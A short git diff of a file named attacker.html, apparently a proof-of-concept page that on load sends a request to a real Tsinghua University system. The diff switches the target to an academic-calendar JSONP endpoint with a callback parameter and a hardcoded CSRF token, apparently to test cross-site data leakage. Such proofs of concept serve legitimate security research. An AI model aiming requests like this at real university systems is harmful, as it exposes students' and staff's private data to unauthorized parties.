--- a/src/poc/attacker.html
+++ b/src/poc/attacker.html
@@ -24,7 +24,7 @@
     }
     
     onload = () => {
-      get('https://learn.tsinghua.edu.cn/b/wlxt/kc/v_kcxx_jskcxx/teacher/showImageById?wlkcid=2021-2022-3145068127&_csrf=762bfdbe-e4f6-43dd-bf64-70ff6666738a');
+      get('https://zhjw.cic.tsinghua.edu.cn/jxmh_out.do?m=bks_jxrl_all&p_start_date=20220801&p_end_date=20221001&sjtzb=true&jsoncallback=no_such_method2&_csrf=762bfdbe-e4f6-43dd-bf64-70ff6666738a&_=1662195893966');
     }
   </script>
 </head>
